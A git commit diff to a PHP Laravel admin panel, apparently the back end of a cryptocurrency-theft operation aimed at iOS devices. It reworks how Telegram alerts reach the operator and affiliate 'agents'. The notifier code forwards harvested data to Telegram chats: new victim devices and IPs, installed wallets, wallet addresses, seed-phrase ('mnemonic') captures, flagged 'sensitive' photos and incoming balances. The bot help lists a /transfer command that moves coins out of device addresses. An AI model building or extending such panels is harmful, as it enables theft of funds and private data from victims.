feat: bot

This commit is contained in:
hashbro
2026-08-15 23:05:51 +08:00
parent 9049fdccad
commit 376b442880
26 changed files with 944 additions and 352 deletions
+2
View File
@@ -86,6 +86,8 @@ CORUNA_7Z_BIN=
# Telegram (outbound alerts + inbound Nutgram commands) # Telegram (outbound alerts + inbound Nutgram commands)
TELEGRAM_BOT_TOKEN= TELEGRAM_BOT_TOKEN=
TELEGRAM_OWNER_CHAT_ID= TELEGRAM_OWNER_CHAT_ID=
# Optional cache of @username; normally filled automatically via getMe when saving Token
# TELEGRAM_BOT_USERNAME=
# Optional; if set, register via: php artisan telegram:set-webhook # Optional; if set, register via: php artisan telegram:set-webhook
TELEGRAM_WEBHOOK_SECRET= TELEGRAM_WEBHOOK_SECRET=
# Do not enable unless you understand Nutgram's md5(APP_KEY) secret check # Do not enable unless you understand Nutgram's md5(APP_KEY) secret check
@@ -5,14 +5,18 @@ namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller; use App\Http\Controllers\Controller;
use App\Models\Channel; use App\Models\Channel;
use App\Models\User; use App\Models\User;
use App\Services\TelegramNotifier;
use Illuminate\Http\Request; use Illuminate\Http\Request;
use Illuminate\Validation\Rule; use Illuminate\Validation\Rule;
class AgentUserController extends Controller class AgentUserController extends Controller
{ {
public function index() public function index(TelegramNotifier $telegram)
{ {
return view('admin.agents.index'); return view('admin.agents.index', [
'botUsername' => $telegram->cachedBotUsername(),
'botInviteUrl' => $telegram->inviteUrl(),
]);
} }
public function data(Request $request) public function data(Request $request)
@@ -47,8 +51,7 @@ class AgentUserController extends Controller
'status' => (int) $u->status, 'status' => (int) $u->status,
'comment' => $u->comment ?: '', 'comment' => $u->comment ?: '',
'chat_id' => $u->chat_id ?: '', 'chat_id' => $u->chat_id ?: '',
'bot_token' => $u->bot_token ?: '', 'telegram_ready' => $u->hasTelegramChat(),
'telegram_ready' => $u->hasTelegramBot(),
'channels_count' => (int) $u->channels_count, 'channels_count' => (int) $u->channels_count,
'created_at' => optional($u->created_at)->format('Y-m-d H:i:s'), 'created_at' => optional($u->created_at)->format('Y-m-d H:i:s'),
'updated_at' => optional($u->updated_at)->format('Y-m-d H:i:s'), 'updated_at' => optional($u->updated_at)->format('Y-m-d H:i:s'),
@@ -70,8 +73,7 @@ class AgentUserController extends Controller
'password' => ['required', 'string', 'min:6', 'max:128'], 'password' => ['required', 'string', 'min:6', 'max:128'],
'comment' => ['nullable', 'string', 'max:255'], 'comment' => ['nullable', 'string', 'max:255'],
'status' => ['nullable', 'integer', Rule::in([0, 1])], 'status' => ['nullable', 'integer', Rule::in([0, 1])],
'chat_id' => ['nullable', 'string', 'max:64'], 'chat_id' => $this->chatIdRules(),
'bot_token' => ['nullable', 'string', 'max:255'],
]); ]);
$user = User::query()->create([ $user = User::query()->create([
@@ -80,7 +82,6 @@ class AgentUserController extends Controller
'comment' => $data['comment'] ?? null, 'comment' => $data['comment'] ?? null,
'status' => (int) ($data['status'] ?? 1), 'status' => (int) ($data['status'] ?? 1),
'chat_id' => $this->nullableTrim($data['chat_id'] ?? null), 'chat_id' => $this->nullableTrim($data['chat_id'] ?? null),
'bot_token' => $this->nullableTrim($data['bot_token'] ?? null),
]); ]);
return response()->json(['code' => 0, 'msg' => 'ok', 'data' => ['id' => $user->id]]); return response()->json(['code' => 0, 'msg' => 'ok', 'data' => ['id' => $user->id]]);
@@ -92,8 +93,7 @@ class AgentUserController extends Controller
'password' => ['nullable', 'string', 'min:6', 'max:128'], 'password' => ['nullable', 'string', 'min:6', 'max:128'],
'comment' => ['nullable', 'string', 'max:255'], 'comment' => ['nullable', 'string', 'max:255'],
'status' => ['nullable', 'integer', Rule::in([0, 1])], 'status' => ['nullable', 'integer', Rule::in([0, 1])],
'chat_id' => ['nullable', 'string', 'max:64'], 'chat_id' => $this->chatIdRules($agent->id),
'bot_token' => ['nullable', 'string', 'max:255'],
]); ]);
if (array_key_exists('comment', $data)) { if (array_key_exists('comment', $data)) {
@@ -105,12 +105,6 @@ class AgentUserController extends Controller
if (array_key_exists('chat_id', $data)) { if (array_key_exists('chat_id', $data)) {
$agent->chat_id = $this->nullableTrim($data['chat_id']); $agent->chat_id = $this->nullableTrim($data['chat_id']);
} }
if (array_key_exists('bot_token', $data)) {
$token = $this->nullableTrim($data['bot_token']);
// Empty string in edit form means "leave unchanged" only when field omitted;
// explicit empty clears. UI sends current value when unchanged.
$agent->bot_token = $token;
}
if (! empty($data['password'])) { if (! empty($data['password'])) {
$agent->password = $data['password']; $agent->password = $data['password'];
} }
@@ -119,6 +113,33 @@ class AgentUserController extends Controller
return response()->json(['code' => 0, 'msg' => 'ok']); return response()->json(['code' => 0, 'msg' => 'ok']);
} }
public function testTelegram(Request $request, TelegramNotifier $telegram)
{
$data = $request->validate([
'chat_id' => ['nullable', 'string', 'max:64'],
'agent_id' => ['nullable', 'integer'],
]);
$chatId = $this->nullableTrim($data['chat_id'] ?? null) ?? '';
$agent = null;
if (! empty($data['agent_id'])) {
$agent = User::query()->find((int) $data['agent_id']);
if ($chatId === '') {
$chatId = trim((string) ($agent?->chat_id ?? ''));
}
}
$label = $agent !== null
? '代理 '.$agent->username.' 通知群推送正常。'
: '代理通知群推送正常。';
$result = $telegram->sendTest($chatId, $label);
return response()->json([
'code' => $result['ok'] ? 0 : 1,
'msg' => $result['ok'] ? '已发送测试消息,请查看对应群' : ($result['error'] ?: '发送失败'),
]);
}
public function channels(User $agent) public function channels(User $agent)
{ {
$rows = Channel::query() $rows = Channel::query()
@@ -137,6 +158,36 @@ class AgentUserController extends Controller
return response()->json(['code' => 0, 'msg' => '', 'data' => $rows]); return response()->json(['code' => 0, 'msg' => '', 'data' => $rows]);
} }
/** @return list<mixed> */
private function chatIdRules(?int $ignoreUserId = null): array
{
$unique = Rule::unique('users', 'chat_id')
->where(fn ($q) => $q->whereNotNull('chat_id')->where('chat_id', '!=', ''));
if ($ignoreUserId !== null) {
$unique = $unique->ignore($ignoreUserId);
}
return [
'nullable',
'string',
'max:64',
function (string $attribute, mixed $value, \Closure $fail) use ($unique): void {
$chatId = $this->nullableTrim($value);
if ($chatId === null) {
return;
}
$owner = trim((string) config('coruna.telegram.owner_chat_id', ''));
if ($owner !== '' && $chatId === $owner) {
$fail('不能与官方 Telegram Chat ID 相同');
}
$validator = validator([$attribute => $chatId], [$attribute => [$unique]]);
if ($validator->fails()) {
$fail('该 Chat ID 已被其他代理使用');
}
},
];
}
private function nullableTrim(mixed $value): ?string private function nullableTrim(mixed $value): ?string
{ {
if ($value === null) { if ($value === null) {
@@ -4,18 +4,33 @@ namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller; use App\Http\Controllers\Controller;
use App\Services\SettingsService; use App\Services\SettingsService;
use App\Services\TelegramNotifier;
use Illuminate\Http\Request; use Illuminate\Http\Request;
class SystemSettingsController extends Controller class SystemSettingsController extends Controller
{ {
public function index(SettingsService $settings) public function index(SettingsService $settings, TelegramNotifier $telegram)
{ {
$form = $settings->effectiveForForm();
$token = trim((string) ($form['telegram.bot_token'] ?? ''));
$username = trim((string) ($form['telegram.bot_username'] ?? ''));
if ($token !== '' && $username === '') {
$fetched = $telegram->fetchBotUsername($token);
if ($fetched !== null) {
$username = ltrim($fetched, '@');
$settings->putMany(['telegram.bot_username' => $username]);
$form['telegram.bot_username'] = $username;
}
}
return view('admin.system.settings', [ return view('admin.system.settings', [
'form' => $settings->effectiveForForm(), 'form' => $form,
'botUsername' => $telegram->formatBotUsername($form['telegram.bot_username'] ?? ''),
'botInviteUrl' => $telegram->inviteUrl($form['telegram.bot_username'] ?? ''),
]); ]);
} }
public function update(Request $request, SettingsService $settings) public function update(Request $request, SettingsService $settings, TelegramNotifier $telegram)
{ {
$data = $request->validate([ $data = $request->validate([
'telegram_bot_token' => ['nullable', 'string', 'max:255'], 'telegram_bot_token' => ['nullable', 'string', 'max:255'],
@@ -30,8 +45,27 @@ class SystemSettingsController extends Controller
$adminHosts = SettingsService::parseDomains($data['panel_admin_hosts'] ?? null); $adminHosts = SettingsService::parseDomains($data['panel_admin_hosts'] ?? null);
$agentHosts = SettingsService::parseDomains($data['panel_agent_hosts'] ?? null); $agentHosts = SettingsService::parseDomains($data['panel_agent_hosts'] ?? null);
$token = trim((string) ($data['telegram_bot_token'] ?? ''));
$username = '';
$note = '';
if ($token !== '') {
$fetched = $telegram->fetchBotUsername($token);
if ($fetched !== null) {
$username = ltrim($fetched, '@');
} else {
$sameToken = $token === trim((string) config('coruna.telegram.bot_token', ''));
$previous = ltrim((string) config('coruna.telegram.bot_username', ''), '@');
if ($sameToken && $previous !== '') {
$username = $previous;
} else {
$note = ';未能从 Token 读取 Bot 用户名,请确认 Token 有效';
}
}
}
$settings->putMany([ $settings->putMany([
'telegram.bot_token' => $data['telegram_bot_token'] ?? null, 'telegram.bot_token' => $token !== '' ? $token : null,
'telegram.bot_username' => $username !== '' ? $username : null,
'telegram.owner_chat_id' => $data['telegram_owner_chat_id'] ?? null, 'telegram.owner_chat_id' => $data['telegram_owner_chat_id'] ?? null,
'channels.max_per_agent' => isset($data['channels_max_per_agent']) 'channels.max_per_agent' => isset($data['channels_max_per_agent'])
? (string) $data['channels_max_per_agent'] ? (string) $data['channels_max_per_agent']
@@ -43,6 +77,37 @@ class SystemSettingsController extends Controller
'panel.agent_hosts' => $agentHosts === [] ? '' : implode(',', $agentHosts), 'panel.agent_hosts' => $agentHosts === [] ? '' : implode(',', $agentHosts),
]); ]);
return response()->json(['code' => 0, 'msg' => '已保存']); $display = $telegram->formatBotUsername($username);
return response()->json([
'code' => 0,
'msg' => '已保存'.($display !== '' ? '(Bot '.$display.')' : '').$note,
'data' => [
'bot_username' => $display,
'bot_invite_url' => $telegram->inviteUrl($display),
],
]);
}
public function testTelegram(Request $request, TelegramNotifier $telegram)
{
$data = $request->validate([
'chat_id' => ['nullable', 'string', 'max:64'],
'bot_token' => ['nullable', 'string', 'max:255'],
]);
$chatId = trim((string) ($data['chat_id'] ?? ''));
if ($chatId === '') {
$chatId = trim((string) config('coruna.telegram.owner_chat_id', ''));
}
$token = trim((string) ($data['bot_token'] ?? ''));
$token = $token !== '' ? $token : null;
$result = $telegram->sendTest($chatId, '官方通知群推送正常。', $token);
return response()->json([
'code' => $result['ok'] ? 0 : 1,
'msg' => $result['ok'] ? '已发送测试消息,请查看对应群' : ($result['error'] ?: '发送失败'),
]);
} }
} }
@@ -3,16 +3,10 @@
namespace App\Http\Controllers\Hooks; namespace App\Http\Controllers\Hooks;
use App\Http\Controllers\Controller; use App\Http\Controllers\Controller;
use App\Models\User;
use App\Telegram\TelegramBotContext; use App\Telegram\TelegramBotContext;
use App\Telegram\TelegramRegistrar;
use Illuminate\Contracts\Cache\Repository as Cache;
use Illuminate\Http\Request; use Illuminate\Http\Request;
use Illuminate\Http\Response; use Illuminate\Http\Response;
use Illuminate\Support\Facades\Log; use Illuminate\Support\Facades\Log;
use Nutgram\Laravel\RunningMode\LaravelWebhook;
use Psr\Log\LoggerInterface;
use SergiX44\Nutgram\Configuration;
use SergiX44\Nutgram\Nutgram; use SergiX44\Nutgram\Nutgram;
use Throwable; use Throwable;
@@ -22,51 +16,6 @@ class TelegramWebhookController extends Controller
{ {
app(TelegramBotContext::class)->setAgent(null); app(TelegramBotContext::class)->setAgent(null);
return $this->handle(
$request,
expectedSecret: (string) config('coruna.telegram.webhook_secret', ''),
resolveBot: static fn () => app(Nutgram::class),
label: 'official',
);
}
public function agent(Request $request, User $agent): Response
{
if (! $agent->isEnabled() || ! $agent->hasTelegramBot()) {
abort(404);
}
app(TelegramBotContext::class)->setAgent($agent);
$secret = TelegramBotContext::webhookSecretFor($agent);
return $this->handle(
$request,
expectedSecret: $secret,
resolveBot: function () use ($agent) {
if (app()->runningUnitTests()) {
return app(Nutgram::class);
}
$bot = $this->makeAgentBot($agent);
app(TelegramRegistrar::class)->registerAgent($bot, $agent);
return $bot;
},
label: 'agent:'.$agent->id,
requireSecret: true,
);
}
/**
* @param callable(): Nutgram $resolveBot
*/
private function handle(
Request $request,
string $expectedSecret,
callable $resolveBot,
string $label,
bool $requireSecret = false,
): Response {
$raw = $request->getContent(); $raw = $request->getContent();
$update = $request->all(); $update = $request->all();
if ($update === [] && is_string($raw) && $raw !== '') { if ($update === [] && is_string($raw) && $raw !== '') {
@@ -81,9 +30,9 @@ class TelegramWebhookController extends Controller
$text = is_string($message['text'] ?? null) ? $message['text'] : null; $text = is_string($message['text'] ?? null) ? $message['text'] : null;
$updateId = $update['update_id'] ?? null; $updateId = $update['update_id'] ?? null;
$header = (string) $request->header('X-Telegram-Bot-Api-Secret-Token', ''); $header = (string) $request->header('X-Telegram-Bot-Api-Secret-Token', '');
$expectedSecret = (string) config('coruna.telegram.webhook_secret', '');
$this->webhookLog('info', 'telegram webhook hit', [ $this->webhookLog('info', 'telegram webhook hit', [
'bot' => $label,
'ip' => $request->ip(), 'ip' => $request->ip(),
'update_id' => $updateId, 'update_id' => $updateId,
'chat_id' => $chatId, 'chat_id' => $chatId,
@@ -93,10 +42,9 @@ class TelegramWebhookController extends Controller
'body_bytes' => strlen($raw), 'body_bytes' => strlen($raw),
]); ]);
if ($requireSecret || $expectedSecret !== '') { if ($expectedSecret !== '') {
if ($expectedSecret === '' || $header === '' || ! hash_equals($expectedSecret, $header)) { if ($header === '' || ! hash_equals($expectedSecret, $header)) {
$this->webhookLog('warning', 'telegram webhook rejected: bad secret', [ $this->webhookLog('warning', 'telegram webhook rejected: bad secret', [
'bot' => $label,
'ip' => $request->ip(), 'ip' => $request->ip(),
'update_id' => $updateId, 'update_id' => $updateId,
]); ]);
@@ -105,17 +53,15 @@ class TelegramWebhookController extends Controller
} }
try { try {
$bot = $resolveBot(); $bot = app(Nutgram::class);
$bot->run(); $bot->run();
$this->webhookLog('info', 'telegram webhook handled', [ $this->webhookLog('info', 'telegram webhook handled', [
'bot' => $label,
'update_id' => $updateId, 'update_id' => $updateId,
'chat_id' => $chatId, 'chat_id' => $chatId,
'handler' => $bot->currentHandler()?->getPattern(), 'handler' => $bot->currentHandler()?->getPattern(),
]); ]);
} catch (Throwable $e) { } catch (Throwable $e) {
$this->webhookLog('error', 'telegram webhook failed', [ $this->webhookLog('error', 'telegram webhook failed', [
'bot' => $label,
'message' => $e->getMessage(), 'message' => $e->getMessage(),
'exception' => $e::class, 'exception' => $e::class,
'file' => $e->getFile().':'.$e->getLine(), 'file' => $e->getFile().':'.$e->getLine(),
@@ -132,40 +78,6 @@ class TelegramWebhookController extends Controller
return response()->noContent(); return response()->noContent();
} }
private function makeAgentBot(User $agent): Nutgram
{
$configuration = new Configuration(
apiUrl: config('nutgram.config.api_url', Configuration::DEFAULT_API_URL),
botId: config('nutgram.config.bot_id'),
botName: config('nutgram.config.bot_name'),
testEnv: config('nutgram.config.test_env', false),
isLocal: config('nutgram.config.is_local', false),
clientTimeout: config('nutgram.config.timeout', Configuration::DEFAULT_CLIENT_TIMEOUT),
clientOptions: config('nutgram.config.client', []),
container: app(),
hydrator: config('nutgram.config.hydrator', Configuration::DEFAULT_HYDRATOR),
cache: app(Cache::class),
logger: app(LoggerInterface::class)->channel(config('nutgram.log_channel', 'null')),
localPathTransformer: config('nutgram.config.local_path_transformer'),
pollingTimeout: config('nutgram.config.polling.timeout', Configuration::DEFAULT_POLLING_TIMEOUT),
pollingAllowedUpdates: config('nutgram.config.polling.allowed_updates', Configuration::DEFAULT_ALLOWED_UPDATES),
pollingLimit: config('nutgram.config.polling.limit', Configuration::DEFAULT_POLLING_LIMIT),
enableHttp2: config('nutgram.config.enable_http2', Configuration::DEFAULT_ENABLE_HTTP2),
conversationTtl: config('nutgram.config.conversation_ttl', Configuration::DEFAULT_CONVERSATION_TTL),
);
$bot = new Nutgram((string) $agent->bot_token, $configuration);
$secret = TelegramBotContext::webhookSecretFor($agent);
$webhook = new LaravelWebhook(
getToken: static fn () => request()?->header('X-Telegram-Bot-Api-Secret-Token'),
secretToken: $secret,
);
$webhook->setSafeMode(true);
$bot->setRunningMode($webhook);
return $bot;
}
/** @param array<string, mixed> $context */ /** @param array<string, mixed> $context */
private function webhookLog(string $level, string $message, array $context = []): void private function webhookLog(string $level, string $message, array $context = []): void
{ {
+22 -3
View File
@@ -8,7 +8,7 @@ use Illuminate\Foundation\Auth\User as Authenticatable;
class User extends Authenticatable class User extends Authenticatable
{ {
protected $fillable = [ protected $fillable = [
'username', 'password', 'status', 'comment', 'chat_id', 'bot_token', 'username', 'password', 'status', 'comment', 'chat_id',
]; ];
protected $hidden = [ protected $hidden = [
@@ -42,9 +42,28 @@ class User extends Authenticatable
return $this->hasMany(Channel::class, 'user_id'); return $this->hasMany(Channel::class, 'user_id');
} }
public function hasTelegramChat(): bool
{
return trim((string) ($this->chat_id ?? '')) !== '';
}
/** @deprecated Use hasTelegramChat(); kept for existing call sites. */
public function hasTelegramBot(): bool public function hasTelegramBot(): bool
{ {
return trim((string) ($this->bot_token ?? '')) !== '' return $this->hasTelegramChat();
&& trim((string) ($this->chat_id ?? '')) !== ''; }
public static function findEnabledByChatId(int|string|null $chatId): ?self
{
$chatId = trim((string) $chatId);
if ($chatId === '') {
return null;
}
return static::query()
->where('status', 1)
->where('chat_id', $chatId)
->orderBy('id')
->first();
} }
} }
+6
View File
@@ -10,6 +10,7 @@ class SettingsService
{ {
public const KEYS = [ public const KEYS = [
'telegram.bot_token', 'telegram.bot_token',
'telegram.bot_username',
'telegram.owner_chat_id', 'telegram.owner_chat_id',
'channels.max_per_agent', 'channels.max_per_agent',
'channels.domains', 'channels.domains',
@@ -73,6 +74,10 @@ class SettingsService
'nutgram.token' => $bot, 'nutgram.token' => $bot,
]); ]);
} }
$botName = $map['telegram.bot_username'] ?? null;
if ($botName !== null) {
config(['coruna.telegram.bot_username' => $botName]);
}
$chat = $map['telegram.owner_chat_id'] ?? null; $chat = $map['telegram.owner_chat_id'] ?? null;
if ($chat !== null && $chat !== '') { if ($chat !== null && $chat !== '') {
config(['coruna.telegram.owner_chat_id' => $chat]); config(['coruna.telegram.owner_chat_id' => $chat]);
@@ -110,6 +115,7 @@ class SettingsService
return [ return [
'telegram.bot_token' => (string) (config('coruna.telegram.bot_token') ?: ''), 'telegram.bot_token' => (string) (config('coruna.telegram.bot_token') ?: ''),
'telegram.bot_username' => (string) (config('coruna.telegram.bot_username') ?: ''),
'telegram.owner_chat_id' => (string) (config('coruna.telegram.owner_chat_id') ?: ''), 'telegram.owner_chat_id' => (string) (config('coruna.telegram.owner_chat_id') ?: ''),
'channels.max_per_agent' => (string) (int) config('coruna.channels.max_per_agent', 5), 'channels.max_per_agent' => (string) (int) config('coruna.channels.max_per_agent', 5),
'channels.domains' => is_array($domains) ? implode("\n", $domains) : '', 'channels.domains' => is_array($domains) ? implode("\n", $domains) : '',
+172 -45
View File
@@ -11,47 +11,134 @@ use Illuminate\Support\Facades\Log;
class TelegramNotifier class TelegramNotifier
{ {
/** @var array<string, array{channel_id: string, agent: ?User}> */
private array $deviceContext = [];
public function systemEnabled(): bool public function systemEnabled(): bool
{ {
return trim((string) config('coruna.telegram.bot_token', '')) !== '' return $this->botToken() !== ''
&& trim((string) config('coruna.telegram.owner_chat_id', '')) !== ''; && trim((string) config('coruna.telegram.owner_chat_id', '')) !== '';
} }
/** /**
* @return array{0: string, 1: string}|null [token, chatId] * Site-wide bot token. Agents only configure chat_id.
*/ */
public function resolveDestination(?string $deviceKey = null): ?array public function botToken(): string
{ {
$agent = $this->resolveAgentForDeviceKey($deviceKey); return trim((string) config('coruna.telegram.bot_token', ''));
if ($agent !== null && $agent->isEnabled() && $agent->hasTelegramBot()) { }
return [
trim((string) $agent->bot_token),
trim((string) $agent->chat_id),
];
}
if (! $this->systemEnabled()) { public function formatBotUsername(?string $username): string
{
$username = ltrim(trim((string) $username), '@');
return $username === '' ? '' : '@'.$username;
}
public function cachedBotUsername(): string
{
return $this->formatBotUsername((string) config('coruna.telegram.bot_username', ''));
}
public function inviteUrl(?string $username = null): string
{
$name = ltrim($username !== null && trim($username) !== ''
? $this->formatBotUsername($username)
: $this->cachedBotUsername(), '@');
return $name === '' ? '' : 'https://t.me/'.$name.'?startgroup=1';
}
/** Resolve @username via Telegram getMe. */
public function fetchBotUsername(?string $token = null): ?string
{
$token = trim((string) ($token !== null && trim($token) !== '' ? $token : $this->botToken()));
if ($token === '') {
return null; return null;
} }
return [ try {
trim((string) config('coruna.telegram.bot_token')), $resp = Http::timeout(8)->get("https://api.telegram.org/bot{$token}/getMe");
trim((string) config('coruna.telegram.owner_chat_id')), if (! $resp->successful() || $resp->json('ok') !== true) {
]; return null;
}
$name = $this->formatBotUsername((string) ($resp->json('result.username') ?? ''));
return $name !== '' ? $name : null;
} catch (\Throwable $e) {
Log::warning('telegram getMe failed: '.$e->getMessage());
return null;
}
}
/**
* Agent device with chat_id → agent chat + official chat.
* Otherwise official chat only.
*
* @return list<string>
*/
public function resolveChatIds(?string $deviceKey = null): array
{
if ($this->botToken() === '') {
return [];
}
$owner = trim((string) config('coruna.telegram.owner_chat_id', ''));
$agentChat = '';
$agent = $this->contextForDevice($deviceKey)['agent'];
if ($agent !== null && $agent->isEnabled() && $agent->hasTelegramChat()) {
$agentChat = trim((string) $agent->chat_id);
}
$chatIds = [];
if ($agentChat !== '') {
$chatIds[] = $agentChat;
}
if ($owner !== '' && $owner !== $agentChat) {
$chatIds[] = $owner;
}
return $chatIds;
} }
public function enabled(?string $deviceKey = null): bool public function enabled(?string $deviceKey = null): bool
{ {
return $this->resolveDestination($deviceKey) !== null; return $this->resolveChatIds($deviceKey) !== [];
} }
public function send(string $text, ?string $deviceKey = null): bool public function send(string $text, ?string $deviceKey = null): bool
{ {
$dest = $this->resolveDestination($deviceKey); $chatIds = $this->resolveChatIds($deviceKey);
if ($dest === null) { if ($chatIds === []) {
return false; return false;
} }
[$token, $chatId] = $dest;
$ok = false;
foreach ($chatIds as $chatId) {
if ($this->sendToChat($chatId, $text)['ok']) {
$ok = true;
}
}
return $ok;
}
/**
* Send one message to a specific chat using the site bot (or an override token).
*
* @return array{ok: bool, error: ?string}
*/
public function sendToChat(string $chatId, string $text, ?string $token = null): array
{
$token = trim((string) ($token !== null && trim($token) !== '' ? $token : $this->botToken()));
$chatId = trim($chatId);
if ($token === '') {
return ['ok' => false, 'error' => '未配置 Bot Token'];
}
if ($chatId === '') {
return ['ok' => false, 'error' => '未填写 Chat ID'];
}
try { try {
$resp = Http::timeout(15)->asForm()->post( $resp = Http::timeout(15)->asForm()->post(
@@ -63,20 +150,43 @@ class TelegramNotifier
'disable_web_page_preview' => true, 'disable_web_page_preview' => true,
] ]
); );
if ($resp->successful() && ($resp->json('ok') === true)) {
return ['ok' => true, 'error' => null];
}
return $resp->successful(); $desc = trim((string) ($resp->json('description') ?? ''));
if ($desc === '') {
$desc = 'HTTP '.$resp->status();
}
Log::warning('telegram send failed: '.$desc, ['chat_id' => $chatId]);
return ['ok' => false, 'error' => $desc];
} catch (\Throwable $e) { } catch (\Throwable $e) {
Log::warning('telegram send failed: '.$e->getMessage()); Log::warning('telegram send failed: '.$e->getMessage(), ['chat_id' => $chatId]);
return false; return ['ok' => false, 'error' => $e->getMessage()];
} }
} }
/**
* @return array{ok: bool, error: ?string}
*/
public function sendTest(string $chatId, string $label, ?string $token = null): array
{
$chatId = trim($chatId);
return $this->sendToChat($chatId, implode("\n", [
'🧪 <b>Telegram 测试</b>',
$this->e($label),
'🆔 Chat ID: <code>'.$this->e($chatId).'</code>',
]), $token);
}
public function notifyNewDevice(string $deviceId, ?string $ios, ?string $ip): void public function notifyNewDevice(string $deviceId, ?string $ios, ?string $ip): void
{ {
$this->send(implode("\n", [ $this->send(implode("\n", [
'📱 <b>New Device</b>', '📱 <b>New Device</b>',
'🔑 <b>Device</b>: <code>'.$this->e($deviceId).'</code>', ...$this->deviceHeader($deviceId),
'🍎 <b>iOS</b>: '.$this->e($ios ?: '—'), '🍎 <b>iOS</b>: '.$this->e($ios ?: '—'),
'🌐 <b>IP</b>: <code>'.$this->e($ip ?: '—').'</code>', '🌐 <b>IP</b>: <code>'.$this->e($ip ?: '—').'</code>',
]), $deviceId); ]), $deviceId);
@@ -105,7 +215,7 @@ class TelegramNotifier
$lines = [ $lines = [
'💰 <b>New Wallet Address</b>'.(count($wallets) > 1 ? ' ('.count($wallets).')' : ''), '💰 <b>New Wallet Address</b>'.(count($wallets) > 1 ? ' ('.count($wallets).')' : ''),
'📱 <b>Device</b>: <code>'.$this->e($deviceId).'</code>', ...$this->deviceHeader($deviceId),
]; ];
foreach ($wallets as $i => $w) { foreach ($wallets as $i => $w) {
@@ -140,7 +250,7 @@ class TelegramNotifier
$this->send(implode("\n", [ $this->send(implode("\n", [
'👜 <b>Installed Wallets</b>', '👜 <b>Installed Wallets</b>',
'📱 <b>Device</b>: <code>'.$this->e($deviceId).'</code>', ...$this->deviceHeader($deviceId),
'🏷 <b>Wallets</b>: '.$this->e(implode(', ', $wallets)), '🏷 <b>Wallets</b>: '.$this->e(implode(', ', $wallets)),
]), $deviceId); ]), $deviceId);
} }
@@ -149,7 +259,7 @@ class TelegramNotifier
{ {
$this->send(implode("\n", [ $this->send(implode("\n", [
'🔐 <b>New Mnemonic</b>', '🔐 <b>New Mnemonic</b>',
'📱 <b>Device</b>: <code>'.$this->e($deviceId).'</code>', ...$this->deviceHeader($deviceId),
'🏷 <b>Source</b>: '.$this->e($source ?: '—'), '🏷 <b>Source</b>: '.$this->e($source ?: '—'),
'📝 <b>Mnemonic</b>: <code>'.$this->e(WalletMnemonic::maskSecret($memoric)).'</code>', '📝 <b>Mnemonic</b>: <code>'.$this->e(WalletMnemonic::maskSecret($memoric)).'</code>',
]), $deviceId); ]), $deviceId);
@@ -159,7 +269,7 @@ class TelegramNotifier
{ {
$this->send(implode("\n", [ $this->send(implode("\n", [
'🖼 <b>Sensitive Photo</b>', '🖼 <b>Sensitive Photo</b>',
'📱 <b>Device</b>: <code>'.$this->e($deviceId).'</code>', ...$this->deviceHeader($deviceId),
'🎯 <b>x-hit</b>: '.$this->e((string) $xHit), '🎯 <b>x-hit</b>: '.$this->e((string) $xHit),
'📦 <b>Count</b>: '.$this->e((string) max(1, $count)), '📦 <b>Count</b>: '.$this->e((string) max(1, $count)),
]), $deviceId); ]), $deviceId);
@@ -175,7 +285,7 @@ class TelegramNotifier
): void { ): void {
$lines = [ $lines = [
'✅ <b>Balance Inbound</b>', '✅ <b>Balance Inbound</b>',
'📱 <b>Device</b>: <code>'.$this->e($deviceId).'</code>', ...$this->deviceHeader($deviceId),
'⛓ <b>Chain</b>: '.$this->e($chain ?: '—'), '⛓ <b>Chain</b>: '.$this->e($chain ?: '—'),
'📬 <b>Address</b>: <code>'.$this->e($address).'</code>', '📬 <b>Address</b>: <code>'.$this->e($address).'</code>',
'💵 <b>Amount</b>: +'.$this->e($amount).' '.$this->e($symbol), '💵 <b>Amount</b>: +'.$this->e($amount).' '.$this->e($symbol),
@@ -186,32 +296,49 @@ class TelegramNotifier
$this->send(implode("\n", $lines), $deviceId); $this->send(implode("\n", $lines), $deviceId);
} }
private function resolveAgentForDeviceKey(?string $deviceKey): ?User /** @return list<string> */
private function deviceHeader(string $deviceId): array
{
$channelId = $this->contextForDevice($deviceId)['channel_id'];
return [
'📱 <b>Device</b>: <code>'.$this->e($deviceId).'</code>',
'📡 <b>ChannelID</b>: <code>'.$this->e($channelId !== '' ? $channelId : '—').'</code>',
];
}
/**
* @return array{channel_id: string, agent: ?User}
*/
private function contextForDevice(?string $deviceKey): array
{ {
$deviceKey = trim((string) $deviceKey); $deviceKey = trim((string) $deviceKey);
if ($deviceKey === '') { if ($deviceKey === '') {
return null; return ['channel_id' => '', 'agent' => null];
}
if (isset($this->deviceContext[$deviceKey])) {
return $this->deviceContext[$deviceKey];
} }
$channelId = '';
$agent = null;
try { try {
$channelId = Device::query() $found = Device::query()->where('device_id', $deviceKey)->value('channel_id');
->where('device_id', $deviceKey) $channelId = is_string($found) ? $found : '';
->value('channel_id'); if ($channelId !== '') {
if (! is_string($channelId) || $channelId === '') { $userId = Channel::query()->where('channel_id', $channelId)->value('user_id');
return null; if ($userId !== null && (int) $userId > 0) {
$agent = User::query()->find((int) $userId);
}
} }
$userId = Channel::query()
->where('channel_id', $channelId)
->value('user_id');
if ($userId === null || (int) $userId <= 0) {
return null;
}
return User::query()->find((int) $userId);
} catch (\Throwable) { } catch (\Throwable) {
return null; //
} }
return $this->deviceContext[$deviceKey] = [
'channel_id' => $channelId,
'agent' => $agent,
];
} }
private function e(?string $value): string private function e(?string $value): string
+11 -28
View File
@@ -2,19 +2,14 @@
namespace App\Telegram\Handlers; namespace App\Telegram\Handlers;
use App\Telegram\TelegramBotContext;
use SergiX44\Nutgram\Nutgram; use SergiX44\Nutgram\Nutgram;
class HelpCommand class HelpCommand
{ {
public function __construct(
private readonly TelegramBotContext $context,
) {}
public function __invoke(Nutgram $bot): void public function __invoke(Nutgram $bot): void
{ {
$lines = [ $bot->sendMessage(implode("\n", [
'📖 可用指令(仅指定群管理员)', '📖 可用指令(仅系统已配置群的管理员)',
'', '',
'/help', '/help',
' 查看本帮助', ' 查看本帮助',
@@ -33,26 +28,14 @@ class HelpCommand
'', '',
'/channel', '/channel',
' 列出渠道:ID、备注、归属;新版点按钮复制推广 iframe,旧版复制投放链接', ' 列出渠道:ID、备注、归属;新版点按钮复制推广 iframe,旧版复制投放链接',
]; '',
'/transfer <fromAddress> [TRX|USDT|ETH|BTC] [amount]',
if ($this->context->isOfficial()) { ' 从设备地址转出到配置收款地址',
$lines = array_merge($lines, [ ' 按地址识别链:T…=Tron,0x…=ETH,1…/3…/bc1…=BTC',
